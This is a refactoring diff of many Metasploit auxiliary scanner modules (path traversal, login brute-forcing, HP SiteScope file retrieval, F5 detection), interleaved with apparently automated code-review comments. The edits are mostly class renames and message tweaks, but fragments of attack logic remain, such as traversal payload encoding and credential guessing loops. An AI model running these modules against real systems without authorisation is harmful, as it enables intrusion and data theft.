@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary results << user_list.flatten.uniq end else - print_error("#{peer} - Unexpected results from server") + print_error("Unexpected results from server") return end end diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb index 77ff86171e..33cc413ff2 100644 --- a/modules/auxiliary/scanner/http/ektron_cms400net.rb +++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb index a521f753cf..410769edab 100644 --- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb +++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << payload.gsub('/', '%2f') travs << file.gsub('/', '%2f') - vprint_status("#{peer} - Retrieving file contents...") + vprint_status("Retrieving file contents...") res = send_request_raw( 'method' => 'GET', @@ -89,10 +89,10 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Checking if it's a vulnerable ElasticSearch") + vprint_status("Checking if it's a vulnerable ElasticSearch") check_code = check_host(ip) - print_status("#{peer} - #{check_code.second}") + print_status("#{check_code.second}") if check_host(ip) != Exploit::CheckCode::Appears return end 
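Review bot: run_host in the -89,10 hunk of elasticsearch_traversal.rb calls `check_host(ip)` twice, once to fill `check_code` and again in `if check_host(ip) != Exploit::CheckCode::Appears`. The probe request is therefore sent a second time, and the printed result and the tested result can differ. Comparing the stored value, `return unless check_code == Exploit::CheckCode::Appears`, avoids that. The rewritten `print_status("#{check_code.second}")` also wraps a single expression in an interpolation; `print_status(check_code.second)` is enough if the value is already a string. run_host continues after the hunk.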
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary contents = read_file(filename) unless contents - print_error("#{peer} - No file downloaded") + print_error("No file downloaded") return end @@ -123,6 +123,6 @@ class Metasploit3 < Msf::Auxiliary fcontent, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index d15f58d6b0..2e07b0c82c 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index fd0a168ace..fc17c05f01 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index 9da9bffde7..887ddc0ec2 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute 
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end @@ -53,15 +53,15 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) - vprint_good("#{peer} - Running EtherPAD Duo application ...") + vprint_good("Running EtherPAD Duo application ...") return true else - vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") + vprint_error("Application is not EtherPAD Duo. Module will not continue.") return false end end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( 
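Review bot: In the `@@ -53,15 +53,15 @@` hunk of etherpad_duo_login.rb, `res.headers['Server'].include?("EtherPAD")` raises NoMethodError when a 200 response carries no Server header, so a host that omits the header produces an exception instead of the "Application is not EtherPAD Duo" message. The success check in `do_login` further down the file already guards this with `res.headers['Server'] &&`. The same protection fits here: `if res && res.code == 200 && res.headers['Server'].to_s.include?("EtherPAD") && res.body.include?("EtherPAD Duo")`. The enclosing method starts outside the hunk.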
@@ -108,16 +108,16 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user, pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD") - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end diff --git a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb index dade96bb4f..9810b6acaa 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 402c7dbdde..b6bcfb05eb 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) 
@@ -42,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT']) return true if res rescue ::Rex::ConnectionRefused - vprint_status("#{peer} - Connection refused") + vprint_status("Connection refused") return false rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return false rescue ::OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL/TLS connection error") + vprint_error("SSL/TLS connection error") return false end end @@ -61,19 +60,19 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIP management interface if res.body =~ /BIG\-IP/ - print_good("#{peer} - F5 BigIP web management interface found") + print_good("F5 BigIP web management interface found") return end # Detect EM management interface if res.body =~ /<title>Enterprise Manager/ - print_good("#{peer} - F5 Enterprise Manager web management interface found") + print_good("F5 Enterprise Manager web management interface found") return end # Detect ARX management interface if res.body =~ /<title>F5 ARX Manager Login<\/title>/ - print_good("#{peer} - ARX web management interface found") + print_good("ARX web management interface found") return end end @@ -81,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIQ management interface res = send_request_raw('method' => 'GET', 'uri' => '/ui/login/') if res && res.code == 200 && res.body =~ /<title>BIG\-IQ/ - print_good("#{peer} - F5 BigIQ web management interface found") + print_good("F5 BigIQ web management interface found") return end # Detect FirePass management interface res = send_request_raw('method' => 'GET', 'uri' => '/admin/', 'rport' => rport) if res && res.code == 200 && res.body =~ /<br><br><br><big><b> FirePass/ - print_good("#{peer} - F5 FirePass web management interface found") + print_good("F5 FirePass web management interface found") return end end 
diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index b203939b13..bcc43e883d 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index ffd2f92819..75e4e8bf90 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index a690c8e661..cbaf9fe9d3 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/http/git_scanner.rb b/modules/auxiliary/scanner/http/git_scanner.rb index ee027272ff..4de859464c 100644 --- a/modules/auxiliary/scanner/http/git_scanner.rb +++ b/modules/auxiliary/scanner/http/git_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/gitlab_login.rb b/modules/auxiliary/scanner/http/gitlab_login.rb index 6217518937..7a5283878b 100644 
--- a/modules/auxiliary/scanner/http/gitlab_login.rb +++ b/modules/auxiliary/scanner/http/gitlab_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/gitlab' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -47,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary ) if res && res.body && res.body.include?('user[email]') - vprint_status("#{peer} - GitLab v5 login page") + vprint_status("GitLab v5 login page") elsif res && res.body && res.body.include?('user[login]') - vprint_status("#{peer} - GitLab v7 login page") + vprint_status("GitLab v7 login page") else vprint_error('Not a valid GitLab login page') return diff --git a/modules/auxiliary/scanner/http/gitlab_user_enum.rb b/modules/auxiliary/scanner/http/gitlab_user_enum.rb index e090a1e07c..da37582bf4 100644 --- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb +++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index ee0000161b..44f0e8cd5d 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute 
diff --git a/modules/auxiliary/scanner/http/goahead_traversal.rb b/modules/auxiliary/scanner/http/goahead_traversal.rb index 0dd40c9e34..2a51219b4c 100644 --- a/modules/auxiliary/scanner/http/goahead_traversal.rb +++ b/modules/auxiliary/scanner/http/goahead_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb index 2fde2d1901..a8db31c196 100644 --- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb +++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index deea80733c..9de954628f 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb index 3339ef4e3b..0d450d626b 100644 --- a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb 
+++ b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb index 1acddfa9d5..7521cecfb1 100644 --- a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb index bb3859b313..e1051a09d8 100644 --- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb index 81f4519f49..2b3c981d67 100644 --- a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb index ec3c90c5c6..25d6ca9f37 100644 --- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb +++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -63,11 +63,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_imc_som? - vprint_error("#{peer} - HP iMC with the SOM component not found") + vprint_error("HP iMC with the SOM component not found") return end - vprint_status("#{peer} - Sending request...") + vprint_status("Sending request...") res = send_request_cgi({ 'uri' => normalize_uri("servicedesk", "servicedesk", "fileDownload"), 'method' => 'GET', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary contents, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Failed to retrieve file") + vprint_error("Failed to retrieve file") return end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb index fa4557f956..231654fd8d 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
@@ -50,14 +50,14 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") res = send_request_cgi({ 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -65,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary end def accessfile - print_status("#{peer} - Retrieving the target hostname") + print_status("Retrieving the target hostname") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -107,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary end if not host_name or host_name.empty? - print_error("#{peer} - Failed to retrieve the host name") + print_error("Failed to retrieve the host name") return end - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -152,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end @@ -160,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end 
@@ -168,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index e60872481f..10ec7754ba 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') @@ -60,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -84,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" - print_status("#{peer} - Retrieving the SiteScope Configuration") + print_status("Retrieving the SiteScope Configuration") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') 
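Review bot: In the `@@ -168,17 +168,17 @@` hunk of hp_sitescope_getfileinternal_fileaccess.rb, `Rex::Text.ungzip($1)` inflates data that appears to come straight from the scanned server's response, and no limit on the inflated size is visible here. A hostile or misbehaving server could return a small body that expands to a very large one and exhaust memory on the operator's machine. Until the length is checked before inflating, the line should at least carry `# NOTE: server-supplied gzip; inflated size is not bounded`. The same call appears in the `@@ -119,17 +119,17 @@` hunk of hp_sitescope_getsitescopeconfiguration.rb. The method starts outside this hunk, so the origin of `$1` is inferred from the surrounding context.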
@@ -103,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end @@ -111,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end @@ -119,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") - print_status("#{peer} - HP SiteScope Configuration saved in #{path}") - print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data") + print_status("HP SiteScope Configuration saved in #{path}") + print_status("HP SiteScope Configuration is saved as Java serialization data") return end - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index db77012186..17b63d8bad 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
@@ -50,7 +50,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APIMonitorImpl') @@ -59,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" + "\r\n" - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") uri = normalize_uri(@uri, 'services/APIMonitorImpl') @@ -104,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m loot = CGI.unescapeHTML($1) if not loot or loot.empty? - print_status("#{peer} - Retrieved empty file") + print_status("Retrieved empty file") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") end end diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb index 4862e49216..d681ead5f8 100644 --- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb +++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -173,15 +173,15 @@ class Metasploit3 < Msf::Auxiliary version = get_version(res) unless version.blank? - print_status("#{peer} - Version detected: #{version}") + print_status("Version detected: #{version}") unless is_version_tested?(version) - print_warning("#{peer} - You're running the module against a version we have not tested") + print_warning("You're running the module against a version we have not tested") end end sys_name = get_system_name(res) unless sys_name.blank? - print_status("#{peer} - System name detected: #{sys_name}") + print_status("System name detected: #{sys_name}") report_note( :host => ip, :type => "system.name", @@ -190,7 +190,7 @@ class Metasploit3 < Msf::Auxiliary end if anonymous_access?(res) - print_good("#{peer} - No login necessary. Server allows anonymous access.") + print_good("No login necessary. Server allows anonymous access.") return end diff --git a/modules/auxiliary/scanner/http/http_header.rb b/modules/auxiliary/scanner/http/http_header.rb index 0fe42d2b52..d344d683a2 100644 --- a/modules/auxiliary/scanner/http/http_header.rb +++ b/modules/auxiliary/scanner/http/http_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_hsts.rb b/modules/auxiliary/scanner/http/http_hsts.rb index 06b6126bad..18a528107f 100644 --- a/modules/auxiliary/scanner/http/http_hsts.rb +++ b/modules/auxiliary/scanner/http/http_hsts.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index de43931a43..83b0db5bd1 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index baf50cc32c..5bcc5160d5 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index 94947a2f96..131f326dc9 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary # Avoids writing to datastore['METHOD'] directly - def method - @method || datastore['METHOD'] + def http_method + @http_method || datastore['METHOD'] end # Avoids writing to datastore['DATA'] directly 
